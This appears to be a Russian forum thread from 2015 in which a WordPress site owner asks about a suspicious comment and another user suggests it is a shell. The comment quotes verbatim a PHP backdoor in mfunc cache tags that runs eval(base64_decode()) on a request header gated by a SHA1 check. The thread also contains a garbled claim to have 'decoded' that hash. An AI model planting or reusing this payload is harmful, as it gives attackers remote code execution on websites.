Вопрос по WP

Тема в разделе "Мегафлуд", создана пользователем JetNet, 15 дек 2015.

  1. JetNet

    JetNet Создатель

    Регистр.:
    23 авг 2015
    Сообщения:
    26
    Симпатии:
    8
    Форумчане, подскажите, что за беда. Прилетел комментарий следующего содержания:

    Комментарий:
    JAKqOxsoGH<!--mfunc if(isset($_SERVER['HTTP_SUM'])) { if (sha1($_SERVER['HTTP_SUM']) == 'a19de0dad29d947840c44881188ce86972e2efa9' ) { eval(base64_decode($_SERVER['HTTP_CMD'])); } } --><!--/mfunc-->

    Что это и как с этим бороться?
     
  2. Rivek

    Rivek Создатель

    Заблокирован
    Регистр.:
    17 ноя 2014
    Сообщения:
    43
    Симпатии:
    9
    Скорее всего шелл или стучалка
    строка a19de0dad29d947840c44881188ce86972e2efa9 имеет такой ответ k_]{GZwo]玼ㇸ㏵׏{ν臨y潀
    base64_decode опасная штука
    почитай Перейти по ссылке
     
  3. JetNet

    JetNet Создатель

    Регистр.:
    23 авг 2015
    Сообщения:
    26
    Симпатии:
    8
    Что можно сделать и как проверить залили или нет? Судя по времени изменения файлов, ничего не изменялось.
     
  4. Rivek

    Rivek Создатель

    Заблокирован
    Регистр.:
    17 ноя 2014
    Сообщения:
    43
    Симпатии:
    9
    Я думаю не залили. Это уязвимость для wp через комментарий. тут тоже можешь Перейти по ссылке
     
  5. JetNet

    JetNet Создатель

    Регистр.:
    23 авг 2015
    Сообщения:
    26
    Симпатии:
    8
    Спасибо, посмотрел, почитал. Но комменты отключены, а версия WP уже давно 4.4, а проблема с 0day относится к 4.2. и ранее. Можно как-то обезопаситься от этого?